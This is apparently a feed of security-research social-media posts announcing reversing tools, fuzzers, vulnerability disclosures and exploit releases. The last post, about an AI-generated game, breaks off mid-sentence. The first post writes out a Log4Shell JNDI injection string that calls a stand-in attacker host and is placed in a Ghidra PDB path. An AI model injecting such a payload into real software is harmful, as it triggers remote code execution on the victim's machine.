For the LOL, If you change the PDB path to "${jndi:ldap://attacker.com/a}", #log4jRCE on #Ghidra

WebSerial based SPI flash explorer - my attempt at making flash-dumping a bit more accessible 🙂

Hope everyone has had a nice holiday season. Decomp2GEF V1.1.0 is out! Convenience Variable Stack Vars support (Wil Gibbs), Native Global Var Symbols support, Configurable connections, and a sick refactor. Demo: youtube.com/watch?v=NSNg0J…. Next on the block: Binja Support.

We did it, Fuzzware is finally open source! Find the code here: github.com/fuzzware-fuzze… And our experiments here: github.com/fuzzware-fuzze… Feel free to try it out. Let me know if you have any comments/suggestions about the project, or questions about the setup.

pkexec

Thanks to itszn , now you can click a play button in the #how2heap main page and start learning various heap exploitation techniques! Want to learn heap in newer libc? No problem. Just select it in the panel on the left!

The ultimate backdoor doesn't exi-

Love using Binary Ninja but also looking for a way to use your reversing work in GDB? Decomp2GEF V1.2.0: Binary Ninja Support is out! Sync reversed symbols from Binja to GDB natively on-the-fly! 1.5 Min Demo: youtu.be/EXObuKNPyaQ. Code link in the thread.

Spectre-v2 is back! Disclosing Branch History Injection (#BHI/#Spectre-BHB), bypassing Spectre-v2 hw defenses to leak arbitrary kernel/host memory (e.g., root password hash below). Joint work by @Enrico barberis Pietro Frigo nSinus-R (@[email protected]) Herbert Bos Cristiano Giuffrida: vusec.net/projects/bhi-s…

Unsafe .Net Deserialization in Windows Event Viewer! This is a by-product of my research. Has confirmed with MSRC that this didn't cross any security boundary, but I guess it could still be another fun #LOLbas or Defender Bypass.😆

I'm proud to release my first Google Chrome RCE derived from the most fascinating and mind bending exploit I have yet analyzed: CVE-2019-13720 Wizard Opium. This is a beautiful bug which I have crafted into an exploit bypassing ASLR, CFG and CET on Win10 github.com/forrest-orr/Wi…

CVE-2022-26134 Vulnerability analysis - Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center #CVE #POC #confluence secpulse.com/archives/18183…

Log4Harmony: we've heard that vulns in Android log device drivers are cool, so here are some UAF, race condition, and KASLR leak bugs in Huawei's hwlog from Gyorgy Miru (Gym), reachable from untrusted and isolated app: labs.taszk.io/blog/post/78_h… labs.taszk.io/blog/post/77_h… labs.taszk.io/blog/post/79_h…

Working on a huge function and the pseudocode listing is too long? Learn how to hide away parts you've already analyzed and not spend time reading it again. hex-rays.com/blog/igors-tip… #IgorsTipOfTheWeek #IDAtips #IDAPro #HexraysDecompiler

My favorite bug among the vulnerabilities I presented today! 😆 The original intent was to compare the password. However, the developer copy-and-pasted the code but forgot to replace the variable name. That leads to the Authentication Bypass on IIS.

🎶I’m BACK in the saddle again!🎶 🐎🤠 Time to get started on #OST2 Vulnerabilities 1002! (Provisionally covering uninitialized data access, race conditions, UAF, type confusion, and info leak (as caused by all the past vuln types.)

I wrote an IDA plugin that queries #ChatGPT and explains decompiled functions. It's still very bleeding edge, but you can find the code here and try it out: github.com/JusticeRage/Ge… (Yes, the video was performed on a very basic case for simplicity's sake.)

Gal Z OpenSecurityTraining2 👏👏

I decided to analyze a VirtualBox VM Escape Vulnerability I found a few years ago - and walk through my younger self's research process! Interesting insights and a cute bug! :) j0nathanj.github.io/Dusting-off-th…

Introducing Multiverse: the first AI-generated multiplayer game. Multiplayer was the missing piece in AI-generated worlds — now it’s here. Players can interact and shape a shared AI-simulated world, in real-time. Training and research cost < $1.5K. Run it on your own PC. We